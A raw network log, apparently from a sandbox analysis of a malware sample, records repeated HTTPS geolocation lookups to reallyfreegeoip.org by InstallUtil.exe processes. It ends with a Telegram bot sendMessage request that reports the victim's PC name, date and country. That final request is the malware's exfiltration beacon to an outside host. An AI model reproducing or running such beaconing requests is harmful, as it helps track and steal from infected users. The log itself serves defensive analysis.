                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50632
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Om16Gk33QsrnPFBtgc9Gbp8hdRJHu3TbBSvVz6qBxCZqxriYyiRUxDgrt0qXB4huSgE19GEQhM%2FMsGrR7%2FcV%2F2QK7i2B7LyaxiBdrpaP4zeUYDOOjYdwycDK085sfewxOYLLwfZQ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf589f4ee7a32fa-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:00 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:06 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:06 UTC | 672 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:06 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50638
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPZOySnVPIfAT890nj9LcXmjoi7XKytdD1UO5zI6AyywY1TpQmez0AKrwqRyPI0ZqHzzf4ZJ0EyCo6QaN9ZBC2WTqe3huORXFtkhRnciT0kY3Ih5NW1aW%2FM4k1QLIVnls0Z0f0Fy"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a19daa18c45-EWR
                                                2024-10-08 10:45:06 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.5 | 49711 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:11 UTC | 708 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50643
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCegOXyuf2lanuDbnFaoaLDtLHy9cn%2BYFZsVpfMHCH7sKeFHdav19GBMPkpiOLJrC%2Fj3vuWc1TYjOxmJht6RdpBs%2BhQydTrWTyR%2BGlGRwEjwZuWeCKyQQK4eeKHCU7LWPxbihjgV"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a3abc474367-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:11 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:15 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:15 UTC | 684 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V24cmL%2BxkgGN4C%2Fj7WPXBfYEyTAFEMizW%2F7RHeaRLchiGn%2BFL7m3eyLlTeF6vs7qbnwyQv4xN4EXGI%2FSSutrHVgVXaPW4lNUbfI1X2hwxawI07S%2Bmqc7VAQ3%2FFD7fVnmoeHY2hVH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a515f153350-EWR
                                                2024-10-08 10:45:15 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.5 | 49721 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:15 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:15 UTC | 676 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wM1UjJ4xoUtLDYSS16kHtv8qJ8WRemaXn79FsoSGo8RkdG63Etohr7nvtWxt7rPhwoV2jC44ojJlMarxtEZWciE%2F5cZnB3jElIoaGIjJhrKu%2BDF3CJulhIIkjQjk%2B0f0Bd4WX5jx"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a550ff541c6-EWR
                                                2024-10-08 10:45:15 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:15 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:15 UTC | 676 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2YaMzhqbR%2B1YYlmLag1D9CDcQ3CyeJviWCLBUFELKVy7VTM3nYE9IIvz09THm4rzXS6ZFCCuScYzi1RdW%2BxFRkj1%2FBWkLrQXLdtiNCntwRyjZSwoeoGm5Elzl1D4fJy5rxJNwRT"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a563c7d72ad-EWR
                                                2024-10-08 10:45:15 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.5 | 49735 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:16 UTC | 676 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50648
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC3pqRijpk8oZWhBgFai8zhz%2FOvzy5Batt1nZ0B5LfggjTIB0NE%2Bmm2HN7ZkCmaSaygVkODR%2FIzR6VnSKEqcJ3Q4DgTi1EH3le5458rBwEYHtVJ3rsz22SF8JhxP3Ob2iFlrrKPk"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a5caa8d42c2-EWR
                                                2024-10-08 10:45:16 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.5 | 49736 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:17 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:17 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50649
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=137Js%2FquBIpwOnPcGMhwwPpV8p1zHGFUvX0l%2F8a%2FXnxnmVm7M5Gqf2xxIrzgjojQ21YaKKI9v16CcCgSwQMpuKSOzZXrEafXtGWxfXlgUIxaLzUw097DWz%2BseBYVp8z2wCEtvsGN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a5dbad21831-EWR
                                                2024-10-08 10:45:17 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:19 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50651
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YM%2BE1P7CgAXDgMbzfl9H48v4eecRU8PbGaRvprYblxiUFt%2B72MYD2KB%2FrkYFHizfAOSy47YrfW0GqMsCp6vmmjcPddO0ma14ALEFMLphlEJ%2FwSqaXbmgbAlyL1LWjef36Cw4wrMi"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a6c290bc47f-EWR
                                                2024-10-08 10:45:19 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.5 | 49745 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:19 UTC | 674 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50651
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfMQUXMo8EayTikeaWXLto3eQlcgvVdpz8ZudVUtQ8URv36SinmN%2BKYS4uVGCPwwsZU4b6XCjs46bKiijBdZcvgJvWwoSKs60dhJDCA2v4JOtExqnOFNH2JQPac8LLS%2FEjIeoPhq"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a6c1fe44361-EWR
                                                2024-10-08 10:45:19 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.5 | 49755 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:21 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:22 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:21 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50653
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARzHfxFIRQn09o6SrL%2B3rpLY2RANe9SUWjXzAtdB47ZgPCCiF8q4bSriWTOqNnI77%2BYy11aRMEJzsl%2BqGgBATMI4f5wOCfLjUbdNt%2B2r3KWZjhYjMyz2j8mD0jlEdb9cDkGNWkjw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a77e957436a-EWR
                                                2024-10-08 10:45:22 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.5 | 49754 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:21 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:22 UTC | 680 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:21 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50653
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=su8oKugQzDbdENL%2B29eshkCIb%2BaJKxQc39RzD1%2BYNPbpMdps5MELkLu2GJgby4VI93NUyKX3NCWHET08m%2BFdabwXw8LAHlAqdmJ8UBBE6EHv0ZOY326ZKfWOw4Z71nISTsQRK%2FWN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a77e9067298-EWR
                                                2024-10-08 10:45:22 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.5 | 49756 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:22 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:22 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50654
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKE9fwG6lCOnlpsGHoiF0dXdHTR9%2BytOYvbtHiy%2BiuU0bWid%2FSYy%2BsGrBtztfhuAdEYQgYkarNqWTpX4QZEYIyyCPa5R4M5i7C9tLzgxnCiXbajPaBa4PB6lTtArGSIDPbIql9FU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a7f9d6f8c0f-EWR
                                                2024-10-08 10:45:22 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.5 | 49769 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC | 706 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbJnELKb97VaqvR9JWAcHQgD0pBe4t46DZy6RkPFJmr3Ohcg%2FW585AQbjEOH2H60VPii1p7rgcHG71Vzmj%2Bxyrp20H%2BuQ7jV8s9uue6ADZ82HLzKh4RoWPs5HOtjPFRbgR2aW4oF"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a854a980f78-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:23 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.5 | 49770 | 188.114.97.3 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC | 676 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0IqAYAQUCNGleTEcpQVSrc8eOZWk7zw6JRlFY1Q9%2BSOZ3g91cbDuqS3ZSqz2BrFpwFyiJiZIgNXqQaIDRAUKz5EUWRIbTZxFF8%2FfrOeZa0XCGxqeSD5r%2BTMLObqUtR1z7Rpna1GS"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a85f921425e-EWR
                                                2024-10-08 10:45:23 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.5 | 49771 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC | 680 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zhZ5CgveUYJ6c7kgGCbxtF3k%2F2BzM2lUMkl%2BJFYv4w00K5ac7FYWeK%2FnfoLae8V1KAPh%2BhOd9mSV7B99bKDNdpgphrshfBDRBHkDKd0BjQEzlruQtfLQaX%2FKf2vo8TfzW2wzwSq"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a8658680f89-EWR
                                                2024-10-08 10:45:23 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.5 | 49778 | 149.154.167.220 | 443 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:24 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
